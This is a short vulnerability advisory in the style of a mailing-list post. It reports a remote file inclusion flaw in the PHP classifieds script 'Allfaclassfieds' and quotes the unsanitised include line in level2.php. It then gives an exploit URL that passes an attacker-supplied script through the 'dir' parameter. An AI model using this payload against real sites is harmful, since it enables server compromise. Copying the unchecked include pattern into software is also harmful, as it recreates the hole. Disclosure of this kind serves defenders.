Allfaclassfieds (level2.php dir) remote file inclusion

Allfaclassfieds  (level2.php dir) remote file inclusion

--
 Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR (at) HackerMail (dot) CoM [email concealed]
 ---

Script: allfaclassfieds

Download: http://scriptat.com/download.php?sid=718
 --

Bug File: level2.php

Bug code in line 4:
 require("$dir/admin/dp.php");

--

Exploit:
 http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]

-- 
_______________________________________________
Get your free email from http://www.hackermail.com